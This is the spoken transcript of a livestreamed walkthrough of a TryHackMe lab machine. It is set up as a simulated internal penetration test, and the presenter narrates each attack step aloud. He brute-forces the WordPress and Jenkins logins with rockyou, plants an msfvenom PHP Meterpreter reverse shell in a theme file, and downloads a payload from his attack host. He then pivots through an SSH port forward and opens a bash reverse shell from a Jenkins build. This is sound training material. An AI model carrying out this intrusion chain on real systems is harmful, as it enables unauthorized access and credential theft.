What's up, hackers? Welcome to Attack on Tuesday. My name is Taggart, and tonight we're going to be doing some offensive cybersecurity work. Going to hopefully work on an internal pen test as part of a TryHackme room. Now, this room is it's the culmination of the offensive pen testing part of the offensive pen testing track in TryHackme. It's a big machine and it's rated as a hard, so not quite sure how much we'll get through of it tonight, but I thought we'd give it a crack just to see how we can do with it. And if we can't, then we'll move on to something else, but we'll see how we do here just for starters. No time to waste then. Let's get right into it. All right, so let's get the music back going. So I have the machine started, at least, and we have an IP. Now, this is the second time I've started this. First time, I wasn't able to get a ping off of it, which might actually be by design. But no, it wasn't. Something just happened with the last start of the machine. So great. Luckily, this thing actually started, and then I'm going to, per the directions, set up my hosts file to match. So this one actually gives you some role play here, or at least a little bit of kind of scoping, the way you would have on a real pen test. So what are we looking at? We're looking at the client requests that an engineer conducts an external web app and internal assessment of the provided virtual environment. So I'm going to do external web app, internal assessment of the provided virtual environment. Now, because this is a full scope pen test, at least of the target, there are some tools that we might want to consider using that we wouldn't necessarily use for every TryHackme room. For example, we might consider using like Greenbone, also known as like Nessus, to do a vulnerability scan as part of a value add for the client. Oh, I don't know about this music tonight. So that might be something that we consider doing. Obviously, we're going to do our normal reconnaissance and enumeration. One thing we want to try to follow as much as we can is the pentest standard. Really, really handy page for those of you who are just getting into this. Telling you a little bit about how to make this work, right? Intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting. I have to tell you that the reporting section was invaluable when I went for my EWPT, the web application penetration test certification, just because it really, really helped structure the report, and it really helped me understand everything that I needed to put in the report to pass. All right, let's get started with the recon then. And I'm also going to be taking notes as we go in my note-taking tool of choice, which is Joplin. So I have notes in Markdown, which really makes it easy for me to save information for later. It's a little bit more structured than I would normally do for notes, but that's kind of by design, right? This is meant to be an internal pen test. I'm trying to be a little bit more formal with it. So that's what we're doing. Okay. So first thing, let's modify that hosts file to point internal.thm to that IP address, which is what they've requested somewhere. Yep, there it is. Ensure that your host file reflects internal.thm. All right. So let's get that going. And then we're going to fire up our port scanner, which is Rust scan. And that looks good. I'm going to take out the no ping because I thought I didn't have a ping at first. And fire that up and see what we get. All right, 2280. Signs are pointing to a Linux machine. That's what I like to see. Because it does have a website, I'm going to fire up Zap. and get ourselves ready to do a web application component of this. And I like to do kind of my recon like this. I'll do it like by ports, just to make it a little bit clearer kind of what I'm talking about in each place. I don't know what's there yet, but I'll have those headings ready for when I do know. Yes, I do want to persist this session, but I'm going to put it in a specific place. TryHackme, and we're going to put it in internal. Okay, we'll update all of our plugins. And then let's go to internal.thm. Just kidding. Thank you, Brave. Yes, I did mean to go to http internal.thm. All right, we're met with an Ubuntu default page, but I don't believe that. Obviously, we've got Apache going. It's Ubuntu of some flavor. View source, just in case somebody did something cute. Doesn't look like it. All right, so now we're gonna have to do some more enumeration on this. So that's gonna mean Ferox Buster and a pretty solid list to see if there are any sub pages here. And let's also add internal.thm to our context. Okay, our Nmap scan finished. Let's see if there was anything cool in there. $22 and $80. That's about it. Now, one of the things that I didn't do is hit every port. And I'll leave that for a little bit later if we need to do further enumeration, but what I might do is do a range of 1 to 65535. Just to hit every single port on the machine. But we'll leave that alone for now. I don't know that I'll need it. Let's start Ferox Buster. And in the interest of time, I'm going to use the big.txt file rather than the gigantic directory list file. See if we can have any luck with that. Okay, and I am going to recurse. So I'll get rid of that -m. Limit of 15 concurrent scans, and I'm using 15 threads. Warm in here tonight. Okay. Let's go back and look at that that Nmap scan, just in case there was anything else that I missed. So, modern version of SSH. Supported methods get and head on HTTP. Yeah, very little. We may have to go and hit the other ports. In fact, let's do it. Nope, wrong thing. Whoa. We got something. /th/JavaScript. What's in /JavaScript? Interesting. So what are we looking at here? JavaScript is redirected. Prototype. Blog. Okay, let's try /blog. All right, we have ourselves a WordPress site. That's good news. Let's put that in our notes. Okay. No posts, but that's still interesting. PHPMyAdmin, that's even more interesting. I can zoom that in for you, make it a little bit easier to see. /WordPress. What's in there? Oh, interesting. So this might be some weird routing with the page. If I try to go to internal.thm to like wp-login.php, where does that take me? Do I get a 404 or okay? But if I go to /blog/ that should work. Yeah. Okay. I don't know why it's Thorax Buster should not be doing this. It should not be running down the page like this. But let's let me get something set up. I suspect that I'm going to need to run WP scan, and I have an account. And do I have WP scan installed? I do. Oh, as a matter of fact, I have the whole thing ready to go. So we'll fire that off. We'll do internal.thm/blog. Yes, let's update WP scan now. All right, it caught it. Go visit PHPMyAdmin just to see what's up there. That's not how you spell that. Wappleizer tells me it's WordPress 5.4.2, so not that old. There may be a vulnerability there, but I suspect if there's a vulnerability, it's going to be within the plugins. No plugins found. Oh, but there is a vulnerability. Authenticated password protected pages exposure. Alright, let's learn some more about that. As one user, create a new password protected post. Ensure that it's in a published state. Log in as another user. Okay. So, maybe not exploitable yet because we don't have a user account. And I don't think we can register. I'm going to run Rust scan with every port, just in case I miss something. So no plugins. That's really, really interesting. Yeah. This may be a rabbit hole. I don't know. I suppose we should do banner grabbing on the SSH port as well. No interesting banners there, so I think we'll leave that alone. And 22 and 80 were the only things that were discovered with all ports, which means we're back to enumeration. So with that, I'm gonna rerun Ferox Buster, and I'm gonna do it, yeah, with a larger list. Oh, and actually, sorry, I'm going to also give it a status set of 200, 301, 403. Okay. Just checking. I'm really hoping this doesn't come down to brute force. It may, though. It may. We do have a username here of admin. Ugh. Boo. Alright, I'm going to pause this discovery, and I'm going to see... Let's take note of the username admin, right? I really like this color scheme. I really do. It makes things very visible. Okay. So, where are we going? WP scan has the ability to brute force logins. If I give it a username, right. So if I do username and password, so if we do, yeah, we'll do username admin, and the passwords we'll give it user share word lists rocku.txt. Good old rocku, see what's up. Now we could have done this with Hydra as well. WP scan is pretty nice because it handles the login URL fairly reasonably. Not as fast as Hydra, but it's, you know, it's okay. Hoping it won't take a million years for this. This is a slow one. It's always interesting, like, when if the room designer decides to use rock you as the word list, you know, how far down are they gonna go with the password? I'm also wondering at this point, you know, how relevant rock you is. There are definitely newer password lists that I think might be more interesting. We certainly had enough breaches recently to make a more interesting new word list. So let's talk about what the probable attack path is here. What I think we're going to end up doing is, if we're able to get into the WordPress site, I love getting into WordPress. Do I have OSCP certification? I absolutely do not have an OSCP. I don't have an OSCP. I've been doing other stuff with my certifications. I've been focusing on web stuff, and also my day job is on the blue team, so I do a lot more threat hunting every day and analysis than I do offensive stuff. Although kind of changing. What I do at work is I tend to be kind of the team's de facto purple teamer. So I'll use offensive tooling to make our defenses better, and actually test to make sure that our detections work by doing threat emulation. But no, I don't have the money really or the time for the offensive security certifications. Can I thread WP scan? I can. But we don't have to, because the password just got cracked. Great, so we got it. My two boys. Awesome. So we'll take note of that. So that's a finding, right? You should never have a password that simple. And certainly nothing that's in a known word list, you know? Alrighty, let's log in. Yep, this email is correct. Let's go. Come on. Oh, thank God. I was like, did we somehow kill it? Great. So what are we going to do? Customize your site. We are going to... Yeah, we're going to drop a PHP Meterpreter shell. This is one of my favorite tricks. Dropping a PHP Meterpreter shell within the theme files. So let's generate that first. So to do that, we're going to use MSF Venom. The payload is PHP, Meterpreter, reverse TCP. That looks good. The output is going to be mt.php. The L host is not that. My IP address is 10.13.7.20. And the L port, this is a real pen test, so I won't use 8888. I'll use something a little bit, less insane, like 8443. Okay. And let me just go get the MSF console up and running. It is absolutely the case that this room can be completed without Metasploit. I'm just using it as a handy utility to keep things organized. I'm not using any of the auto exploits from it. I'm just using the listener basically for the Meterpreter reverse shell. Set payload. Set payload. PHP. Interpreter. Reverse TCP. Set lhost 10.13.7.20. Wow, I guess I was writing some Rust earlier, and let is just stuck in my head. Set L port. Or I just can't type. That's also a possibility. Set L port. Check our options. Looks good. So our handler is running, and our payload has been built. So I'm gonna just fire up gedit to get that PHP code out. Here's why. It's a lot, and it's gonna be easier to copy and paste if I have it in gedit than if I have it in like Vim or something. So I'm just gonna Control-C that. And then coming over to here, we'll go to Appearance. And customize. Is that right? Nope, wrong thing. I always go to the wrong one of these. It's the theme editor, I think. One of these gives us a PHP editor. Yep, there it is. So we'll put it on the 4. I like doing this. I like putting it on the 404 template. And right up at the top. Okay. If we go visit the site, and we'll go to like hosts hello world, and then let's just take one of these off. Hello whoa word. Okay, we got a 500. But did I get a callback? No. So something went wrong with this. Let's see. Let's just delete what's there. See if we do any better this time. Oh, I like that. There we go. There's our interpreter session. Okay. And we have our interpreter session. Sessions 1. Okay. Let's get into a shell here. All right, it's Linux 64-bit. Great news. And I'm in var dub HTML. And yeah, this is configured correctly, so yeah, see how it says nobody? I can't write to anything cool here, but that's okay. What I want to do is get to a place. Does it start as a comment? Nemo, good question. It does, sort of. Yeah. But it actually does execute. This is, I think, more than anything to get rid of... Yeah, this is an end of a multi-line comment, so it's actually to take care of anything that would be on the other end of the multi-line, I think. No, that's wrong. This is the beginning of a multi-line comment. But it's before the PHP, so it still executes. It's pretty wild. If you ever look through like the Meterpreter payloads to see everything that it does, it's pretty nuts. Okay, so I need to make myself another payload. Let's kill Ferox Buster for the moment. Because I want... Linux x64 interpreter. And we'll call that 8444. The reason we're doing this is because obviously the PHP shell is not super stable. And I want a more stable shell, so I'm going to go ahead and get one. By downloading it directly from my attack box. So I'm going to cd to temp here. And that is world writable. Interestingly, there's stuff already here in temp. That's fun. I don't know what this is, but we're going to find out. It's images. There may be some cron job that's making this happen. I don't know. But we're going to get wget http://10.13.7.20 port 8000/mt. And you can see over here that I got a connection from there, so I am downloading it correctly. There it is. We're going to chmod it to execute. And then I'm going to Control Z out of this, background the channel and the session, and then change up my options for my multi-handler in Metasploit here to change my L port to 8444 and the payload to Linux x64 interpreter reverse TCP. And I'm going to run that as a separate listen. So if I look at my jobs, you can see that that one is now running. The other listener finished because I got a session. Go to my sessions, there's my PHP shell. So I'll select sessions 1. I go to channel-L, it lists my channels. This is the one that I kicked off already. So I'll go channel-I to interact with it, 0. And you see I still have that MT executable. So I'm going to run it with /MT. And now I have another Meterpreter session. And that's the one I really want to use. So I'll background this and I'll keep it open. I won't kill the session. But sessions 2, this is the one I really want to use because it's more stable, at least as far as I know. So let's get a shell here. And let's give ourselves an actual PTY. Dope. Python 3 is there. Python 3. C. Import PTY. PTY.spawn. Bin bash. Python 3. Import PTY. PTY.spawn, not /spawn. bin bash. And now we have an actual good-looking shell. Okay, so now these permissions so far have been pretty well set. Yeah, so we're not going to get lucky enough to be able to look at Aubriana with the www data user. Not lucky enough to do that. Just in case something funny is set up here, let's just use sudo-l. Okay. No passwords configured for that, so we didn't get lucky there. Just going to do some basic enumeration of this Linux machine. Cat etc password. And actually, with this, let's take a screenshot right here to demonstrate our exploitation. Let's put a who am I in there as well. And we'll put that in our notes. And not under recon, but under exploitation. And then one thing I love about Joplin is the way that it handles screenshots, where if I paste it from the clipboard, it'll generate a file right in here, and just handle it, so I have the image for when I need it later. Really, really handy. All right. So what do we got? We got Aubriana, we've got MySQL. Oh, yeah, that's right. There's another thing we need to do. Forgot about that. We have to at the wp config.php because there may be something useful in the database. We don't know for sure, but it's possible. Although this does look fairly well configured. MySQL-u WordPress-p show databases. Okay, use WordPress. Show tables. Show columns. Who's oh my god, show columns. AP users. Select user login, user pass from WP users. I bet it's probably just admin. Yep, that's something we haven't seen before. But let's see if there's anything in posts. Show columns from WP posts. Select post title. Post content. From posts. WP posts. Seems a bit unnecessary, but alright. Yo, glad we did that. Look at that. There are protected posts. Actually, we probably could have seen that if we hadn't been stupid in here. Let's see what this private post is. Don't forget to reset Will's credentials. William Arnold 147. And let's take notes of that as well. But Will is not a system user, unfortunately. At least not that I saw. Let's exit out of MySQL. So I don't know if there's anything to really be done with that, but it is a good finding for a pen test, right? Nothing we can use to exploit this system, but still valuable as a finding. All right. Invocation ID is an environment variable that I'm not used to seeing. Oh, it's a systemd thing. Okay. It's Ubuntu 18.04, so I probably don't have, a whole lot of 0 days or anything, or, not 0 days, but like kernel exploits to go after here, which is fine. Okay, well, we've got something in opt. Containerd, that's exciting. What's WP save? Okay, we have user credentials. So that's going to be, let's copy that text over. Cool. Aubriana needed these credentials for something later. Let her know you have them and where they are. Let's try SSH. SSH Aubriana at internal.thn. Okay, I don't know why that didn't work the first time. I think there was a line break or something, but it definitely worked the second time. So we're in as user. Let's screenshot that. Again, for our pen test report. Oh wait, that actually should be... Yeah, it's fine. Hey, Detox. How much time would it take to systems network folks to learn the CTFs? Wow. That's a really interesting question. It depends. The CTFs... let's split that up. The systems and networks folks would have very, very different kind of gaps to fill in for learning. The networking folks are going to have a huge advantage for packet capture CTFs and kind of that area of things. And even in, you know, the exploitation, like hacking boxes, getting flags on systems, understanding how networking works, they're going to have a lot better time handling like SSH port forwarding, things like that. Systems folks, you know, I've said it before, I'll say it again, that the best prep I had for the security work was all the time I spent as a voluntary Linux systems administrator and an everyday Linux user. It really, understanding that OS in a deep way really gave me a leg up. And then my personal path has meant that I've had to do a lot of reinforcement and remedial learning on Windows and understanding Windows internals, because I didn't have to engage with it for a long time. My own machines were Linux, and then I was like an admin for a lot of Mac stuff for a long time. So I don't know how much time. How much time really depends on what you put in. I don't know, even with those classifications, I don't know what you know already. But I will certainly say it's not impossible. I came from... They say the web dev could learn this in 3 months. Bull. That's just not true. There's to learn this. What is that? Like everything? You're talking about steganography, binary exploitation, reverse engineering, the networking that web devs don't usually need to get their hands dirty with. If you're talking about everything that goes on in a CTF, no. It's a totally different mindset. And that's actually another point. The mindset itself takes a long time. And developers, at least in my experience, have some of the hardest time with that. Developers spend so much time trying to build a thing to work that changing up that thought process and starting to think about how to make things not work or use things against their design, that's a big bar to clear. Now, I might be slow, but it didn't take me, after 10 years of doing IT administration, and really hitting every level of the stack, from installing Cat6 cable, like making my own terminations and doing VLAN stuff, all the way up to writing React applications, like literally everything that's involved in IT. It didn't take me 3 months to be moderately proficient at this. There are CCNAs who fail the OSCP. Yeah, there are CCNAs who fail the OSCP, and I'll bet there are OSCPs who would fail the CCNA. You know, they're totally different knowledge domains. Let's get that user flag. Jenkins, huh? All right, there's our first flag. I'll tell you this, Detox. I don't love giving time estimates for how long it's going to take somebody to learn something, because really everybody has different, learning processes, learning speeds. Okay, Aubriana has sudo. What's in Jenkins? Ooh, the internal Jenkins service is running at 8080. That's so interesting. Look at that. It says 172.17.0.2, but our IP address is Docker 0 is at 172. Okay. That's not gonna work. The CCNA folks I know say they don't know the OSCP stuff yet. The OSCP stuff, I mean, and just like offensive security skills, are so rarefied that it's a little bit funky to have that expertise anywhere but there. There's no way. Yeah, I can't run Docker. But Docker's on here, which is interesting. Okay, that's a finding though. So we'll catch the internal Jenkins services running. Now, I don't think I can hit that, but I'll try. Oh, man. We have to do that which I do not love to do. Does mean they don't know SQL map, Showdown, or the things you learn by using these. CCNAs are pretty... I mean, look, I don't want to speak for every one of them, but the CCNA certification is really about networking, right? It's about building a network of computers, primarily using Cisco equipment. So they're going to know that domain of knowledge. They won't necessarily understand. If you show them a Shodan report, they'll be like, oh, okay, I understand that these services are open and somebody messed up their firewall rules or something like that. They'll understand it, but they won't necessarily do recon with Shodan, things like that. SQL map also probably not. SQL map, it's not an administrative tool, right? I've built databases for years before ever touching SQL map because SQL map's job is to exploit them. If I'm not in the business of trying to break the thing, I won't necessarily use that tool. So the Jenkins service is up. I don't know how. But did I always know SQL map? No. 2017 me did not know SQL map. I'm looking at this. So we have 172.17.0.2. Now I cannot, from my web server or my web browser, hit that address, right? Because I'm on a different network. And I didn't even know you could do this with TryHackme outside of the special rooms, where plainly another machine is spun up. Well, kind of. I guess what's going on is that, yeah, they did it with Docker. So I see what's going on. Basically, they've run a Docker host on a bridge network. That's kind of a cool trick. So to simulate the rest of the network here, they've run Docker with a bridge network so that there's 172.17.0.1, and then I can hit 172 if I do IP route. Yeah, see? So 172.17.0.0, if I do a .2, what's happening is it's actually going through Docker on this machine. So it is still one VM, but they're using Docker to simulate the rest of the network. That's a cool trick. I like that. I might have to pull that off for if I ever do one of these. Okay, so yeah, we have to do the thing that I hate doing, which is SSH port forwarding. And I hate doing it because I always forget the syntax for it. Thank you, cheat sheet. Let's go. Right, this is what I want to do. Okay. So this is the target host 192. The target host is running a service on port 8888, and you want that service available on the local host port 7777. So that's going to be SSH-L let's make that available on 9000. But it's at 172.17.0.2, right? Port 8080. And then Aubriana at internal.thm. I think that's right. If not, we'll find out soon enough. So what I'm doing here is I'm using an SSH connection to forward TCP traffic over that tunnel. Okay. Now, it looks like I have two shells here, but this one's job is doing that tunnel. So if I did this right... Yes! Alright, so what we were able to do then is pivot, right? We were able to pivot to the internal networks Jenkins server. Okay. Now, did I ever read about hedge fund infrastructure? No. I have not. I spent 100% of my professional career in nonprofits and public institutions. I've spent very little mental energy on private equity. Oh, that's cool. Learning the Swift protocol by reading about malware. All right, so we have Jenkins here. Now, it's possible that Aubriana has a... It's possible that Aubriana has an account here. Right? But it's also possible that that William credential that we found has something to do with this. Yeah, so let's try William. And Arnold 147. No such luck. Does Jenkins have... Just admin and password, huh? Okay. No such luck. Admin. Jenkins? No. What did this say specifically? Bill, also known as William, Aubriana, needed these credentials for something later. Let her know you have them and where they are. Does TryHackme have hedge fund stuff? Not that I know of. But then again, I wasn't looking. Aubriana needed these credentials for something later. Let her know you have them and where they are. So William would have been looking at opt. Try this one more time, just in case. We'll try admin with the will credentials. And if not, we're just going to have to enumerate some more. Nope. Was the PHP my admin thing just a red herring? Because, you know, I guess I would have the WordPress user, but I wouldn't have the root MySQL user. Nothing fun in there. So root can log in on SSH. That's cute. I left my why are you confusing me so much that folks don't do the CTFs? Yeah, no problem. I left my laptop unlocked at my friend's place. So was... I mean, you could do things to find out. The truth is, though, that security professionals don't do stuff like that, generally speaking. They have jobs and they like to keep them. They don't do crimes for that reason. Internal sudo. Rihanna. Change password for root. Failed password for root. This all has to be the setup of the machine. Okay, time to run linpeas. Time to run linpeas. So I'm going to grab the linpiece script from my machine. I'm going to run that. See if there's anything fun to be discovered in there. Now, the other thing I can do while that is doing that is I can just try whoa, what? Oh. I've never seen that before. Oh, because okay, right. It's the proxy is bypassed for this. Well, that's okay. Does it do it for all local hosts or just the... Yeah, it does. Can I fix that? Okay, I'm proxying this now. So I should see it in Zap. But no, I don't. Bummer. That's okay. J password. J username. There's no CSRF token on this thing? Hell yeah. Okay, let's see what Lin Peace found. The WordPress stuff always makes a lot of noise on Lin Peace, but it's almost never useful. There's the auth log, which we were just looking at. Interesting. Screen. That might come. That might be interesting to check out. Not backend HT password. Yeah. All right, I'll check that out. But I can't. Okay. Okay. Not a whole lot there. Just in case I missed it, let's look for the SWIDs. Hmm. Are you kidding me? Docker was installed as a snap. Oh, it's not a thing. Okay. So now I'm going to try to do a post request to this Jenkins. This Jenkins endpoint. Just to see. Okay, works. And what was the response? 302. Let's tell it to follow. Cool. So I got a 403. Now let's do data. Oops. Data. J. What is it? Username. I think. Yeah, J username equals admin. J password equals admin. And what is the crumb? Not in there. No valid crumb was included in the request. I really need to be able to capture this thing. Zap isn't seeing it, which is annoying. And also isn't always the case. Like I'm gonna close Zap and open it back up and see if I can do any better. Sometimes I've noticed Zap will stop like showing history, and I don't always know what the reason is, but it definitely happens. Okay, but it's definitely not showing it here. So I'll just bring up the internal session again. There's another way to do this, isn't there? Yeah, if I just need the request, I can get it from the Chrome responder, the Chrome recorder. What is this? No valid Chrome was included in the request. What is this? Oh. Turns out there's another place we can go. From issuer API JSON. Oh, it should be a GET request to that. Oh, interesting. The user is admin password. Okay. Now I think we have something that we can test here. So now that we have this from issuer API JSON that's giving us a 401 on the return, what we can do is we can throw that at Hydra. This is just my port forward. I don't need that much of a shell on that. Let's get up another window and let's give that a little bit more space. Right, so we're going to do Hydra. Login is going to be admin. The password is going to be, yeah, rocku.text. And, whoops. Rocku.text. The, yeah, internal. No, actually, it's going to be localhost. And I have to give it the service, I think, of 9000. That's the port in Hydra language. Then we have to give it the HTTP GET. And then we have to give it the from issuer / API / JSON. That's the path we're going to. Then I think that's it. Is it lowercase s for service? Yes. Holy crap. I did not expect that to work. Okay, so admin SpongeBob. Okay. Let's get a screenshot of that happening. Okay. Admin SpongeBob. Awesome. All right, now we're in a Jenkins server. Woo. Okay, just admin. Build history. No build history whatsoever. Script console. I don't really want this. What I want to do is create a new item. Yeah, freestyle project. And for this, I know I'm going to need another window here. I've gone Tmux crazy. Post build actions. Add post build action. No. Add build step. Execute shell. That's what I wanted. So what we're going to do, we're going to end up getting a reverse shell from the command line out of this Jenkins environment. Okay? Now, depending on what's been mounted inside here, there may be some other secrets that we can get at. That's my hope. So to do that, we're going to run, we've got little hack tools in here. 10.13.7.20 and whoops, 7.20. And let's run this one on 8888. I'm bored of the easy ones. So we'll run this with we'll try it with bash. I'm not convinced this one's going to work just because I don't know if bash is in the Docker container. It might be. We'll give it a shot. So we'll run on netcat listener on 8888. Apply. Save. Build now. Yes. Yes. Okay. So I've got a shell in here. Ooh, secret.key and secret.key not so secret. Let's get a screenshot of that working. This might be like the smoothest an offensive stream has ever gone for me. So thanks for being here to see it happen. Oh, file isn't here. That's exciting. Hmm. Alright, so we've got these secret.keys in here. We also have secret.key. I'm going to exfiltrate that with netcat. This way. Netcat's not found. Okay, well, I guess never mind. But that's okay, because I can just copy this. Okay. And this tiny pub.gpg. What is this? It's a public key block. That's what I want to do. I swapped the Tmux windows. Let's just copy this PGP key. It's so long. Gotta get out of here soon, but I feel like we're close. Now, there's nothing in secret.key.notsosecret. That's not helpful. But do we have anything in secrets that looks interesting? Master.key. Alright, we have a master.key, we have a GPG key, but we don't have, it doesn't seem like we have an encrypted message. Alright, so this Jenkins Docker container, you know, we have a shell in here, but what do we have, really? I don't know. How do you configure a Docker container? Hmm. Now that's very interesting. Um, one wonders if this was somebody's mounted home folder. Although it doesn't look like it. It doesn't look like Aubriana's, right? And I was the only user. Oh, crap. Okay. Let's see what note.txt is. Oh, okay. We're home. Yeah, we just got root. Okay. Holy crap. I think that's the first hard box I've ever... I mean, it was long, but I don't think it was hard. Damn. All right. Let's finish that note up here. And let's go save this for posterity. With 12 minutes to spare. Let's go. All right. Well, friends, that was a good day's work. Thank you for hanging out. It's 1,000,000 degrees in here, so I'm going to get out of here. Let's see if there's someplace cool to send y'all. Anybody else who's streaming at the moment? Not really. So I will send you on your merry way. But thank you so much for hanging out. I'll be back tomorrow night doing some programming. Be good to yourselves, be good to each other, and happy hacking. We'll see you next time.